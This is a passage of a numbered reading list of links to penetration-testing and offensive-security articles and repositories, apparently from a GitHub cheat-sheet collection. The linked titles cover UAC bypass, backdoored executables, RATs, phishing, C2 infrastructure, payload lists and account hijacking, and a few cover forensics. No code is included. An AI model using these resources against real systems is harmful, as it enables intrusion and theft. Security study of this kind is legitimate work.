https://github.com/NoorQureshi/kali-linux-cheatsheet -93-Pentesting Cheatsheet: https://anhtai.me/pentesting-cheatsheet/ -94-Command Injection Exploitation through Sqlmap in DVWA (OS-cmd): http://www.hackingarticles.in/command-injection-exploitation-through-sqlmap-in-dvwa -95-XSS Payload List - Cross Site Scripting Vulnerability Payload List: https://www.kitploit.com/2018/05/xss-payload-list-cross-site-scripting.html -96-Analyzing CVE-2018-6376 – Joomla!, Second Order SQL Injection: https://www.notsosecure.com/analyzing-cve-2018-6376/ -97-Exploiting Sql Injection with Nmap and Sqlmap: http://www.hackingarticles.in/exploiting-sql-injection-nmap-sqlmap -98-awesome-malware-analysis: https://github.com/rshipp/awesome-malware-analysis -99-Anatomy of UAC Attacks: https://www.fuzzysecurity.com/tutorials/27.html -100-awesome-cyber-skills: https://github.com/joe-shenouda/awesome-cyber-skills -101-5 ways to Banner Grabbing: http://www.hackingarticles.in/5-ways-banner-grabbing -102-6 Ways to Hack PostgresSQL Login: http://www.hackingarticles.in/6-ways-to-hack-postgressql-login -103-6 Ways to Hack SSH Login Password: http://www.hackingarticles.in/6-ways-to-hack-ssh-login-password -104-10 Free Ways to Find Someone’s Email Address: https://medium.com/p/e6f37f5fe10a -105-USING A SCF FILE TO GATHER HASHES: https://1337red.wordpress.com/using-a-scf-file-to-gather-hashes -106-Hack Remote Windows PC using DLL Files (SMB Delivery Exploit): http://www.hackingarticles.in/hack-remote-windows-pc-using-dll-files-smb-delivery-exploit 107-Hack Remote Windows PC using Office OLE Multiple DLL Hijack Vulnerabilities: http://www.hackingarticles.in/hack-remote-windows-pc-using-office-ole-multiple-dll-hijack-vulnerabilities -108-BUG BOUNTY HUNTING (METHODOLOGY , TOOLKIT , TIPS & TRICKS , Blogs): https://medium.com/p/ef6542301c65 -109-How To Perform External Black-box Penetration Testing in Organization with “ZERO” Information: https://gbhackers.com/external-black-box-penetration-testing -110-A Complete Penetration Testing & Hacking Tools List for Hackers & Security Professionals: https://gbhackers.com/hacking-tools-list -111-Most Important Considerations with Malware Analysis Cheats And Tools list: https://gbhackers.com/malware-analysis-cheat-sheet-and-tools-list -112-Awesome-Hacking: https://github.com/Hack-with-Github/Awesome-Hacking -113-awesome-threat-intelligence: https://github.com/hslatman/awesome-threat-intelligence -114-awesome-yara: https://github.com/InQuest/awesome-yara -115-Red-Team-Infrastructure-Wiki: https://github.com/bluscreenofjeff/Red-Team-Infrastructure-Wiki -116-awesome-pentest: https://github.com/enaqx/awesome-pentest -117-awesome-cyber-skills: https://github.com/joe-shenouda/awesome-cyber-skills -118-pentest-wiki: https://github.com/nixawk/pentest-wiki -119-awesome-web-security: https://github.com/qazbnm456/awesome-web-security -120-Infosec_Reference: https://github.com/rmusser01/Infosec_Reference -121-awesome-iocs: https://github.com/sroberts/awesome-iocs -122-blackhat-arsenal-tools: https://github.com/toolswatch/blackhat-arsenal-tools -123-awesome-social-engineering: https://github.com/v2-dev/awesome-social-engineering -124-Penetration Testing Framework 0.59: www.vulnerabilityassessment.co.uk/Penetration%20Test.html -125-Penetration Testing Tools Cheat Sheet : https://highon.coffee/blog/penetration-testing-tools-cheat-sheet/ -126-SN1PER – A Detailed Explanation of Most Advanced Automated Information Gathering & Penetration Testing Tool: https://gbhackers.com/sn1per-a-detailed-explanation-of-most-advanced-automated-information-gathering-penetration-testing-tool -127-Spear Phishing 101: https://blog.inspired-sec.com/archive/2017/05/07/Phishing.html -128-100 ways to discover (part 1): https://sylarsec.com/2019/01/11/100-ways-to-discover-part-1/ -129-Comprehensive Guide to SSH Tunnelling: http://www.hackingarticles.in/comprehensive-guide-to-ssh-tunnelling/ -130-Capture VNC Session of Remote PC using SetToolkit: http://www.hackingarticles.in/capture-vnc-session-remote-pc-using-settoolkit/ -131-Hack Remote PC using PSEXEC Injection in SET Toolkit: http://www.hackingarticles.in/hack-remote-pc-using-psexec-injection-set-toolkit/ -132-Denial of Service Attack on Network PC using SET Toolkit: http://www.hackingarticles.in/denial-of-service-attack-on-network-pc-using-set-toolkit/ -133-Hack Gmail and Facebook of Remote PC using DNS Spoofing and SET Toolkit: http://www.hackingarticles.in/hack-gmail-and-facebook-of-remote-pc-using-dns-spoofing-and-set-toolkit/ -134-Hack Any Android Phone with DroidJack (Beginner’s Guide): http://www.hackingarticles.in/hack-android-phone-droidjack-beginners-guide/ -135-HTTP RAT Tutorial for Beginners: http://www.hackingarticles.in/http-rat-tutorial-beginners/ -136-5 ways to Create Permanent Backdoor in Remote PC: http://www.hackingarticles.in/5-ways-create-permanent-backdoor-remote-pc/ -137-How to Enable and Monitor Firewall Log in Windows PC: http://www.hackingarticles.in/enable-monitor-firewall-log-windows-pc/ -138-EMPIRE TIPS AND TRICKS: https://enigma0x3.net/2015/08/26/empire-tips-and-tricks/ -139-CSRF account takeover Explained Automated/Manual: https://medium.com/p/447e4b96485b -140-CSRF Exploitation using XSS: http://www.hackingarticles.in/csrf-exploitation-using-xss -141-Dumping Domain Password Hashes: https://pentestlab.blog/2018/07/04/dumping-domain-password-hashes/ -142-Empire Post Exploitation – Unprivileged Agent to DA Walkthrough: https://bneg.io/2017/05/24/empire-post-exploitation/ -143-Dropbox for the Empire: https://bneg.io/2017/05/13/dropbox-for-the-empire/ -144-Empire without PowerShell.exe: https://bneg.io/2017/07/26/empire-without-powershell-exe/ -145-REVIVING DDE: USING ONENOTE AND EXCEL FOR CODE EXECUTION: https://enigma0x3.net/2018/01/29/reviving-dde-using-onenote-and-excel-for-code-execution/ -146-PHISHING WITH EMPIRE: https://enigma0x3.net/2016/03/15/phishing-with-empire/ -146-BYPASSING UAC ON WINDOWS 10 USING DISK CLEANUP: https://enigma0x3.net/2016/07/22/bypassing-uac-on-windows-10-using-disk-cleanup/ -147-“FILELESS” UAC BYPASS USING EVENTVWR.EXE AND REGISTRY HIJACKING: https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/ -148-“FILELESS” UAC BYPASS USING SDCLT.EXE: https://enigma0x3.net/2017/03/17/fileless-uac-bypass-using-sdclt-exe/ -149-PHISHING AGAINST PROTECTED VIEW: https://enigma0x3.net/2017/07/13/phishing-against-protected-view/ -150-LATERAL MOVEMENT USING EXCEL.APPLICATION AND DCOM: https://enigma0x3.net/2017/09/11/lateral-movement-using-excel-application-and-dcom/ -151-enum4linux Cheat Sheet: https://highon.coffee/blog/enum4linux-cheat-sheet/ -152-enumeration: https://technologyredefine.blogspot.com/2017/11/enumeration.html -153-Command and Control – WebSocket: https://pentestlab.blog/2017/12/06/command-and-control-websocket -154-Command and Control – WMI: https://pentestlab.blog/2017/11/20/command-and-control-wmi -155-Dangerous Virus For Windows Crashes Everything Hack window Using Virus: http://thelearninghacking.com/create-virus-hack-windows/ -156-Comprehensive Guide to Nmap Port Status: http://www.hackingarticles.in/comprehensive-guide-nmap-port-status -157-Commix – Automated All-in-One OS Command Injection and Exploitation Tool: https://gbhackers.com/commix-automated-all-in-one-os-command-injection-and-exploitation-tool -158-Compromising Jenkins and extracting credentials: https://www.n00py.io/2017/01/compromising-jenkins-and-extracting-credentials/ -159-footprinting: https://technologyredefine.blogspot.com/2017/09/footprinting_17.html -160-awesome-industrial-control-system-security: https://github.com/hslatman/awesome-industrial-control-system-security -161-xss-payload-list: https://github.com/ismailtasdelen/xss-payload-list -162-awesome-vehicle-security: https://github.com/jaredthecoder/awesome-vehicle-security -163-awesome-osint: https://github.com/jivoi/awesome-osint -164-awesome-python: https://github.com/vinta/awesome-python -165-Microsoft Windows - UAC Protection Bypass (Via Slui File Handler Hijack) (Metasploit): https://www.exploit-db.com/download/44830.rb -166-nbtscan Cheat Sheet: https://highon.coffee/blog/nbtscan-cheat-sheet/ -167-neat-tricks-to-bypass-csrfprotection: www.slideshare.net/0ang3el/neat-tricks-to-bypass-csrfprotection -168-ACCESSING CLIPBOAR D FROM THE LOC K SC REEN IN WI NDOWS 10 #2: https://oddvar.moe/2017/01/27/access-clipboard-from-lock-screen-in-windows-10-2/ -169-NMAP CHEAT-SHEET (Nmap Scanning Types, Scanning Commands , NSE Scripts): https://medium.com/p/868a7bd7f692 -170-Nmap Cheat Sheet: https://highon.coffee/blog/nmap-cheat-sheet/ -171-Powershell Without Powershell – How To Bypass Application Whitelisting, Environment Restrictions & AV: https://www.blackhillsinfosec.com/powershell-without-powershell-how-to-bypass-application-whitelisting-environment-restrictions-av/ -172-Phishing with PowerPoint: https://www.blackhillsinfosec.com/phishing-with-powerpoint/ -173-hide-payload-ms-office-document-properties: https://www.blackhillsinfosec.com/hide-payload-ms-office-document-properties/ -174-How to Evade Application Whitelisting Using REGSVR32: https://www.blackhillsinfosec.com/evade-application-whitelisting-using-regsvr32/ -175-How to Build a C2 Infrastructure with Digital Ocean – Part 1: https://www.blackhillsinfosec.com/build-c2-infrastructure-digital-ocean-part-1/ -176-WordPress Penetration Testing using Symposium Plugin SQL Injection: http://www.hackingarticles.in/wordpress-penetration-testing-using-symposium-plugin-sql-injection -177-Manual SQL Injection Exploitation Step by Step: http://www.hackingarticles.in/manual-sql-injection-exploitation-step-step -178-MSSQL Penetration Testing with Metasploit: http://www.hackingarticles.in/mssql-penetration-testing-metasploit -179-Multiple Ways to Get root through Writable File: http://www.hackingarticles.in/multiple-ways-to-get-root-through-writable-file -180-MySQL Penetration Testing with Nmap: http://www.hackingarticles.in/mysql-penetration-testing-nmap -181-NetBIOS and SMB Penetration Testing on Windows: http://www.hackingarticles.in/netbios-and-smb-penetration-testing-on-windows -182-Network Packet Forensic using Wireshark: http://www.hackingarticles.in/network-packet-forensic-using-wireshark -183-Escape and Evasion Egressing Restricted Networks: https://www.optiv.com/blog/escape-and-evasion-egressing-restricted-networks/ -183-Awesome-Hacking-Resources: https://github.com/vitalysim/Awesome-Hacking-Resources -184-Hidden directories and les as a source of sensitive information about web application: https://medium.com/p/84e5c534e5ad -185-Hiding Registry keys with PSRe ect: https://posts.specterops.io/hiding-registry-keys-with-psreflect-b18ec5ac8353 -186-awesome-cve-poc: https://github.com/qazbnm456/awesome-cve-poc -187-Linux Capabilities Privilege Escalation via OpenSSL with SELinux Enabled and Enforced: https://medium.com/p/74d2bec02099 -188-Post Exploitation in Windows using dir Command: http://www.hackingarticles.in/post-exploitation-windows-using-dir-command 189-Web Application Firewall (WAF) Evasion Techniques #2: https://medium.com/secjuice/web-application-firewall-waf-evasion-techniques-2-125995f3e7b0 -190-Forensics Investigation of Remote PC (Part 1): http://www.hackingarticles.in/forensics-investigation-of-remote-pc-part-1 -191-CloudFront Hijacking: https://www.mindpointgroup.com/blog/pen-test/cloudfront-hijacking/ -192-PowerPoint and Custom Actions: https://cofense.com/powerpoint-and-custom-actions/ -193-Privilege Escalation on Windows 7,8,10, Server 2008, Server 2012 using Potato: http://www.hackingarticles.in/privilege-escalation-on-windows-7810-server-2008-server-2012-using-potato -194-How to intercept TOR hidden service requests with Burp: https://medium.com/p/6214035963a0 -195-How to Make a Captive Portal of Death: https://medium.com/p/48e82a1d81a/share/twitter -196-How to find any CEO’s email address in minutes: https://medium.com/p/70dcb96e02b0 197-Microsoft Windows 10 - Child Process Restriction Mitigation Bypass: https://www.exploit-db.com/download/44888.txt -198-Microsoft Windows - Token Process Trust SID Access Check Bypass Privilege Escalation: https://www.exploit-db.com/download/44630.txt -199-Microsoft Word upload to Stored XSS: https://www.n00py.io/2018/03/microsoft-word-upload-to-stored-xss/ -200-MobileApp-Pentest-Cheatsheet: https://github.com/tanprathan/MobileApp-Pentest-Cheatsheet -201-awesome: https://github.com/sindresorhus/awesome -201-writing arm shellcode: https://azeria-labs.com/writing-arm-shellcode/ -202-debugging with gdb introduction: https://azeria-labs.com/debugging-with-gdb-introduction/ -203-emulate raspberrypi with qemu: https://azeria-labs.com/emulate-raspberry-pi-with-qemu/ -204-Bash One-Liner to Check Your Password(s) via pwnedpasswords.com’s API Using the k-Anonymity Method: https://medium.com/p/a5807a9a8056 -205-A Red Teamer's guide to pivoting: https://artkond.com/2017/03/23/pivoting-guide/ -206-Using WebDAV features as a covert channel: https://arno0x0x.wordpress.com/2017/09/07/using-webdav-features-as-a-covert-channel/ -207-A View of Persistence: https://rastamouse.me/2018/03/a-view-of-persistence/ -208- pupy websocket transport: https://bitrot.sh/post/28-11-2017-pupy-websocket-transport/ -209-Subdomains Enumeration Cheat Sheet: https://pentester.land/cheatsheets/2018/11/.../subdomains-enumeration-cheatsheet.html -210-DNS Reconnaissance – DNSRecon: https://pentestlab.blog/2012/11/13/dns-reconnaissance-dnsrecon/ -211-Cheatsheets: https://bitrot.sh/cheatsheet -212-Understanding Guide to Nmap Firewall Scan (Part 2): http://www.hackingarticles.in/understanding-guide-nmap-firewall-scan-part-2 -213-Exploit Office 2016 using CVE-2018-0802: https://technologyredefine.blogspot.com/2018/01/exploit-office-2016-using-cve-2018-0802.html -214-windows-exploit-suggester: https://technologyredefine.blogspot.com/2018/01/windows-exploit-suggester.html -215-INSTALLING PRESISTENCE BACKDOOR IN WINDOWS: https://technologyredefine.blogspot.com/2018/01/installing-presistence-backdoor-in.html -216-IDS, IPS AND FIREWALL EVASION USING NMAP: https://technologyredefine.blogspot.com/2017/09/ids-ips-and-firewall-evasion-using-nmap.html -217-Wireless Penetration Testing Checklist – A Detailed Cheat Sheet: https://gbhackers.com/wireless-penetration-testing-checklist-a-detailed-cheat-sheet 218-Most Important Web Application Security Tools & Resources for Hackers and Security Professionals: https://gbhackers.com/web-application-security-tools-resources -219-Web Application Penetration Testing Checklist – A Detailed Cheat Sheet: https://gbhackers.com/web-application-penetration-testing-checklist-a-detailed-cheat-sheet -220-Top 500 Most Important XSS Script Cheat Sheet for Web Application Penetration Testing: https://gbhackers.com/top-500-important-xss-cheat-sheet -221-USBStealer – Password Hacking Tool For Windows Machine Applications: https://gbhackers.com/pasword-hacking -222-Most Important Mobile Application Penetration Testing Cheat sheet with Tools & Resources for Security Professionals: https://gbhackers.com/mobile-application-penetration-testing -223-Metasploit Can Be Directly Used For Hardware Penetration Testing Now: https://gbhackers.com/metasploit-can-be-directly-used-for-hardware-vulnerability-testing-now -224-How to Perform Manual SQL Injection While Pentesting With Single quote Error Based Parenthesis Method: https://gbhackers.com/manual-sql-injection-2 -225-Email Spoo ng – Exploiting Open Relay configured Public Mailservers: https://gbhackers.com/email-spoofing-exploiting-open-relay -226-Email Header Analysis – Received Email is Genuine or Spoofed: https://gbhackers.com/email-header-analysis -227-Most Important Cyber Threat Intelligence Tools List For Hackers and Security Professionals: https://gbhackers.com/cyber-threat-intelligence-tools -228-Creating and Analyzing a Malicious PDF File with PDF-Parser Tool: https://gbhackers.com/creating-and-analyzing-a-malicious-pdf-file-with-pdf-parser-tool -229-Commix – Automated All-in-One OS Command Injection and Exploitation Tool: https://gbhackers.com/commix-automated-all-in-one-os-command-injection-and-exploitation-tool -230-Advanced ATM Penetration Testing Methods: https://gbhackers.com/advanced-atm-penetration-testing-methods -231-A8-Cross-Site Request Forgery (CSRF): https://gbhackers.com/a8-cross-site-request-forgery-csrf -232-Fully undetectable backdooring PE File: https://haiderm.com/fully-undetectable-backdooring-pe-file/ -233-backdooring exe files: https://haiderm.com/tag/backdooring-exe-files/ -234-From PHP (s)HELL to Powershell Heaven: https://medium.com/p/da40ce840da8 -235-Forensic Investigation of Nmap Scan using Wireshark: http://www.hackingarticles.in/forensic-investigation-of-nmap-scan-using-wireshark -236-Unleashing an Ultimate XSS Polyglot: https://github.com/0xsobky/HackVault/wiki -237-wifi-arsenal: https://github.com/0x90/wifi-arsenal -238-XXE_payloads: https://gist.github.com/staaldraad/01415b990939494879b4 -239-xss_payloads_2016: https://github.com/7ioSecurity/XSS-Payloads/raw/master/xss_payloads_2016 -240-A curated list of awesome command-line frameworks, toolkits, guides and gizmos. Inspired by awesome-php.: https://github.com/alebcay/awesome-shell -241-The goal of this repository is to document the most common techniques to bypass AppLocker.: https://github.com/api0cradle/UltimateAppLockerByPassList -242-A curated list of CTF frameworks, libraries, resources and softwares: https://github.com/apsdehal/awesome-ctf -243-A collection of android security related resources: https://github.com/ashishb/android-security-awesome -244-OSX and iOS related security tools: https://github.com/ashishb/osx-and-ios-security-awesome -245-regexp-security-cheatsheet: https://github.com/attackercan/regexp-security-cheatsheet -246-PowerView-2.0 tips and tricks: https://gist.github.com/HarmJ0y/3328d954607d71362e3c -247-A curated list of awesome awesomeness: https://github.com/bayandin/awesome-awesomeness -248-Android App Security Checklist: https://github.com/b-mueller/android_app_security_checklist -249-Crack WPA/WPA2 Wi-Fi Routers with Airodump-ng and Aircrack-ng/Hashcat: https://github.com/brannondorsey/wifi-cracking -250-My-Gray-Hacker-Resources: https://github.com/bt3gl/My-Gray-Hacker-Resources -251-A collection of tools developed by other researchers in the Computer Science area to process network traces: https://github.com/caesar0301/awesome-pcaptools -252-A curated list of awesome Hacking tutorials, tools and resources: https://github.com/carpedm20/awesome-hacking -253-RFSec-ToolKit is a collection of Radio Frequency Communication Protocol Hacktools.: https://github.com/cn0xroot/RFSec-ToolKit -254-Collection of the cheat sheets useful for pentesting: https://github.com/coreb1t/awesome-pentest-cheat-sheets -255-Collection of the cheat sheets useful for pentesting: https://github.com/coreb1t/awesome-pentest-cheat-sheets -256-Collection of the cheat sheets useful for pentesting: https://github.com/coreb1t/awesome-pentest-cheat-sheets -257-A curated list of awesome forensic analysis tools and resources: https://github.com/cugu/awesome-forensics -258-Open-Redirect-Payloads: https://github.com/cujanovic/Open-Redirect-Payloads -259-A Threat hunter's playbook to aid the development of techniques and hypothesis for hunting campaigns.: https://github.com/Cyb3rWard0g/ThreatHunter-Playbook -260-Windows memory hacking library: https://github.com/DarthTon/Blackbone -261-A collective list of public JSON APIs for use in security.: https://github.com/deralexxx/security-apis -262-An authoritative list of awesome devsecops tools with the help from community experiments and contributions.: https://github.com/devsecops/awesome-devsecops -263-List of Awesome Hacking places, organised by Country and City, listing if it features power and wifi: https://github.com/diasdavid/awesome-hacking-spots -264-A comprehensive curated list of available Bug Bounty & Disclosure Programs and Write-ups: https://github.com/djadmin/awesome-bug-bounty -265-Notes for taking the OSCP in 2097: https://github.com/dostoevskylabs/dostoevsky-pentest-notes -266-A curated list of awesome Windows Exploitation resources, and shiny things. Inspired by awesom: https://github.com/enddo/awesome-windows-exploitation -267-A curated list of resources (books, tutorials, courses, tools and vulnerable applications) for learning about Exploit Development: https://github.com/FabioBaroni/awesome-exploit-development -268-A curated list of awesome reversing resources: https://github.com/fdivrp/awesome-reversing -269-Git All the Payloads! A collection of web attack payloads: https://github.com/foospidy/payloads -270-GitHub Project Resource List: https://github.com/FuzzySecurity/Resource-List -271-Use your macOS terminal shell to do awesome things.: https://github.com/herrbischoff/awesome-macos-command-line -272-Defeating Windows User Account Control: https://github.com/hfiref0x/UACME -273-Free Security and Hacking eBooks: https://github.com/Hack-with-Github/Free-Security-eBooks -274-Universal Radio Hacker: investigate wireless protocols like a boss: https://github.com/jopohl/urh -275-A curated list of movies every hacker & cyberpunk must watch: https://github.com/k4m4/movies-for-hackers -276-Various public documents, whitepapers and articles about APT campaigns: https://github.com/kbandla/APTnotes -277-A database of common, interesting or useful commands, in one handy referable form: https://github.com/leostat/rtfm -278-A curated list of tools for incident response: https://github.com/meirwah/awesome-incident-response -279-A curated list of awesome guides, tools, and other resources related to the security and compromise of locks, safes, and keys: https://github.com/meitar/awesome-lockpicking -280-A curated list of static analysis tools, linters and code quality checkers for various programming languages: https://github.com/mre/awesome-static-analysis -281-A Collection of Hacks in IoT Space so that we can address them (hopefully): https://github.com/nebgnahz/awesome-iot-hacks -281-A Course on Intermediate Level Linux Exploitation: https://github.com/nnamon/linux-exploitation-course -282-Kali Linux Cheat Sheet for Penetration Testers: https://github.com/NoorQureshi/kali-linux-cheatsheet -283-A curated list of awesome infosec courses and training resources.: https://github.com/onlurking/awesome-infosec -284-A curated list of resources for learning about application security: https://github.com/paragonie/awesome-appsec -285-an awesome list of honeypot resources: https://github.com/paralax/awesome-honeypots 286-GitHub Enterprise SQL Injection: https://www.blogger.com/share-post.g?blogID=2987759532072489303&postID=6980097238231152493 -287-A curated list of fuzzing resources ( Books, courses - free and paid, videos, tools, tutorials and vulnerable applications to practice on ) for learning Fuzzing and initial phases of Exploit Development like root cause analysis: https://github.com/secfigo/Awesome-Fuzzing -288-PHP htaccess injection cheat sheet: https://github.com/sektioneins/pcc/wiki -289-A curated list of the awesome resources about the Vulnerability Research: https://github.com/sergey-pronin/Awesome-Vulnerability-Research -290-A list of useful payloads and bypass for Web Application Security and Pentest/CTF: https://github.com/swisskyrepo/PayloadsAllTheThings -291-A collection of Red Team focused tools, scripts, and notes: https://github.com/threatexpress/red-team-scripts -292-Awesome XSS stuff: https://github.com/UltimateHackers/AwesomeXSS -293-A collection of hacking / penetration testing resources to make you better!: https://github.com/vitalysim/Awesome-Hacking-Resources -294-Docker Cheat Sheet: https://github.com/wsargent/docker-cheat-sheet -295-Decrypted content of eqgrp-auction-file.tar.xz: https://github.com/x0rz/EQGRP -296-A bunch of links related to Linux kernel exploitation: https://github.com/xairy/linux-kernel-exploitation -297-Penetration Testing 102 - Windows Privilege Escalation Cheatsheet: www.exumbraops.com/penetration-testing-102-windows-privilege-escalation-cheatsheet -298-Pentesting Cheatsheet: https://anhtai.me/pentesting-cheatsheet/ -299-Windows Privilege Escalation Methods for Pentesters: https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/ -300-Penetration Testing Cheat Sheet For Windows Machine – Intrusion Detection: -301-Reading Your Way Around UAC (Part 1): https://tyranidslair.blogspot.co.uk/2017/05/reading-your-way-around-uac-part-1.html -302--Reading Your Way Around UAC (Part 2): https://tyranidslair.blogspot.co.uk/2017/05/reading-your-way-around-uac-part-2.html -303-Executing Metasploit & Empire Payloads from MS Office Document Properties (part 2 of 2): https://stealingthe.network/executing-metasploit-empire-payloads-from-ms-office-document-properties-part-2-of-2/ -304-SSRF - Server Side Request Forgery (Types and ways to exploit it) Part-1: https://medium.com/p/29d034c27978 -304-Automating Cobalt Strike,Aggressor Collection Scripts: https://github.com/bluscreenofjeff/AggressorScripts https://github.com/harleyQu1nn/AggressorScripts -305-Vi Cheat Sheet: https://highon.coffee/blog/vi-cheat-sheet/ -306-Network Recon Cheat Sheet: https://www.cheatography.com/coffeefueled/cheat-sheets/network-recon/ -307-LFI Cheat Sheet: https://highon.coffee/blog/lfi-cheat-sheet/ -308-Systemd Cheat Sheet: https://highon.coffee/blog/systemd-cheat-sheet/ -309-Aircrack-ng Cheatsheet: https://securityonline.info/aircrack-ng-cheatsheet/ -310-Kali Linux Cheat Sheet for Penetration Testers: https://www.blackmoreops.com/?p=7212 -311-Wifi Pentesting Command Cheatsheet: https://randomkeystrokes.com/2016/07/01/wifi-pentesting-cheatsheet/ -312-Android Testing Environment Cheatsheet (Part 1): https://randomkeystrokes.com/2016/10/17/android-testing-environment-cheatsheet/ -313-cheatsheet: https://randomkeystrokes.com/category/cheatsheet/ -314-Reverse Shell Cheat Sheet: https://highon.coffee/blog/reverse-shell-cheat-sheet/ -315-Linux Commands Cheat Sheet: https://highon.coffee/blog/linux-commands-cheat-sheet/ -316-Linux Privilege Escalation using Sudo Rights: http://www.hackingarticles.in/linux-privilege-escalation-using-exploiting-sudo-rights -317-Linux Privilege Escalation using Misconfigured NFS: http://www.hackingarticles.in/linux-privilege-escalation-using-misconfigured-nfs/ -318-Linux Privilege Escalation by Exploiting Cronjobs: http://www.hackingarticles.in/linux-privilege-escalation-by-exploiting-cron-jobs/ -319-Web Penetration Testing: http://www.hackingarticles.in/web-penetration-testing/ -320-Webshell to Meterpreter: http://www.hackingarticles.in/webshell-to-meterpreter -321-WordPress Penetration Testing using WPScan & Metasploit: http://www.hackingarticles.in/wordpress-penetration-testing-using-wpscan-metasploit -322-XSS Exploitation in DVWA (Bypass All Security): http://www.hackingarticles.in/xss-exploitation-dvwa-bypass-security -323-Linux Privilege Escalation Using PATH Variable: http://www.hackingarticles.in/linux-privilege-escalation-using-path-variable/ -324-VNC tunneling over SSH: http://www.hackingarticles.in/vnc-tunneling-ssh -325-VNC Pivoting through Meterpreter: http://www.hackingarticles.in/vnc-pivoting-meterpreter -326-Week of Evading Microsoft ATA - Announcement and Day 1: https://www.labofapenetrationtester.com/2017/08/week-of-evading-microsoft-ata-day1.html -327-Abusing DNSAdmins privilege for escalation in Active Directory: https://www.labofapenetrationtester.com/2017/05/abusing-dnsadmins-privilege-for-escalation-in-active-directory.html -328-Using SQL Server for attacking a Forest Trust: https://www.labofapenetrationtester.com/2017/03/using-sql-server-for-attacking-forest-trust.html -329-Empire : http://www.harmj0y.net/blog/category/empire/ -330-8 Deadly Commands You Should Never Run on Linux: https://www.howtogeek.com/125157/8-deadly-commands-you-should-never-run-on-linux/ -331-External C2 framework for Cobalt Strike: https://www.insomniacsecurity.com/2018/01/11/externalc2.html -332-How to use Public IP on Kali Linux: http://www.hackingarticles.in/use-public-ip-kali-linux -333-Bypass Admin access through guest Account in windows 10: http://www.hackingarticles.in/bypass-admin-access-guest-account-windows-10 -334-Bypass Firewall Restrictions with Metasploit (reverse_tcp_allports): http://www.hackingarticles.in/bypass-firewall-restrictions-metasploit-reverse_tcp_allports -335-Bypass SSH Restriction by Port Relay: http://www.hackingarticles.in/bypass-ssh-restriction-by-port-relay -336-Bypass UAC Protection of Remote Windows 10 PC (Via FodHelper Registry Key): http://www.hackingarticles.in/bypass-uac-protection-remote-windows-10-pc-via-fodhelper-registry-key -337-Bypass UAC in Windows 10 using bypass_comhijack Exploit: http://www.hackingarticles.in/bypass-uac-windows-10-using-bypass_comhijack-exploit -338-Bind Payload using SFX archive with Trojanizer: http://www.hackingarticles.in/bind-payload-using-sfx-archive-trojanizer -339-Capture NTLM Hashes using PDF (Bad-Pdf): http://www.hackingarticles.in/capture-ntlm-hashes-using-pdf-bad-pdf -340-Best of Post Exploitation Exploits & Tricks: http://www.hackingarticles.in/best-of-post-exploitation-exploits-tricks/ -341-Detect SQL Injection Attack using Snort IDS: http://www.hackingarticles.in/detect-sql-injection-attack-using-snort-ids/ -342-Beginner Guide to Website Footprinting: http://www.hackingarticles.in/beginner-guide-website-footprinting/ -343-How to Enable and Monitor Firewall Log in Windows PC: http://www.hackingarticles.in/enable-monitor-firewall-log-windows-pc/ -344-Wifi Post Exploitation on Remote PC: http://www.hackingarticles.in/wifi-post-exploitation-remote-pc/ -335-Check Meltdown Vulnerability in CPU: http://www.hackingarticles.in/check-meltdown-vulnerability-cpu -336-XXE: https://phonexicum.github.io/infosec/xxe.html -337-[XSS] Re ected XSS Bypass Filter: https://medium.com/p/de41d35239a3 -338-Engagement Tools Tutorial in Burp suite: http://www.hackingarticles.in/engagement-tools-tutorial-burp-suite -339-Wiping Out CSRF: https://medium.com/@jrozner/wiping-out-csrf-ded97ae7e83f -340-First entry: Welcome and fileless UAC bypass: https://winscripting.blog/2017/05/12/first-entry-welcome-and-uac-bypass/ -341-Writing a Custom Shellcode Encoder: https://medium.com/p/31816e767611 -342-Security Harden CentOS 7 : https://highon.coffee/blog/security-harden-centos-7/ -343-THE BIG BAD WOLF - XSS AND MAINTAINING ACCESS: https://www.paulosyibelo.com/2018/06/the-big-bad-wolf-xss-and-maintaining.html -344-MySQL: https://websec.ca/kb/CHANGELOG.txt -345-Deobfuscation of VM based software protection: http://shell-storm.org/talks/SSTIC2017_Deobfuscation_of_VM_based_software_protection.pdf -346-Online Assembler and Disassembler: http://shell-storm.org/online/Online-Assembler-and-Disassembler/ -347-Shellcodes database for study cases: http://shell-storm.org/shellcode/ -348-Dynamic Binary Analysis and Obfuscated Codes: http://shell-storm.org/talks/sthack2016-rthomas-jsalwan.pdf -349-How Triton may help to analyse obfuscated binaries: http://triton.quarkslab.com/files/misc82-triton.pdf -350-Triton: A Concolic Execution Framework: http://shell-storm.org/talks/SSTIC2015_English_slide_detailed_version_Triton_Concolic_Execution_FrameWork_FSaudel_JSalwan.pdf -351-Automatic deobfuscation of the Tigress binary protection using symbolic execution and LLVM: https://github.com/JonathanSalwan/Tigress_protection -352-What kind of semantics information Triton can provide?: http://triton.quarkslab.com/blog/What-kind-of-semantics-information-Triton-can-provide/ -353-Code coverage using a dynamic symbolic execution: http://triton.quarkslab.com/blog/Code-coverage-using-dynamic-symbolic-execution/ -354-Triton (concolic execution framework) under the hood: http://triton.quarkslab.com/blog/first-approach-with-the-framework/ -355-- Stack and heap overflow detection at runtime via behavior analysis and Pin: http://shell-storm.org/blog/Stack-and-heap-overflow-detection-at-runtime-via-behavior-analysis-and-PIN/ -356-Binary analysis: Concolic execution with Pin and z3: http://shell-storm.org/blog/Binary-analysis-Concolic-execution-with-Pin-and-z3/ -357-In-Memory fuzzing with Pin: http://shell-storm.org/blog/In-Memory-fuzzing-with-Pin/ -358-Hackover 2015 r150 (outdated solving for Triton use cases): https://github.com/JonathanSalwan/Triton/blob/master/src/examples/python/ctf-writeups/hackover-ctf-2015-r150/solve.py -359-Skip sh – Web Application Security Scanner for XSS, SQL Injection, Shell injection: https://gbhackers.com/skipfish-web-application-security-scanner -360-Sublist3r – Tool for Penetration testers to Enumerate Sub-domains: https://gbhackers.com/sublist3r-penetration-testers -361-bypassing application whitelisting with bginfo: https://oddvar.moe/2017/05/18/bypassing-application-whitelisting-with-bginfo/ -362-accessing-clipboard-from-the-lock-screen-in-windows-10: https://oddvar.moe/2017/01/24/accessing-clipboard-from-the-lock-screen-in-windows-10/ -363-bypassing-device-guard-umci-using-chm-cve-2017-8625: https://oddvar.moe/2017/08/13/bypassing-device-guard-umci-using-chm-cve-2017-8625/ -364-defense-in-depth-writeup: https://oddvar.moe/2017/09/13/defense-in-depth-writeup/ -365-applocker-case-study-how-insecure-is-it-really-part-1: 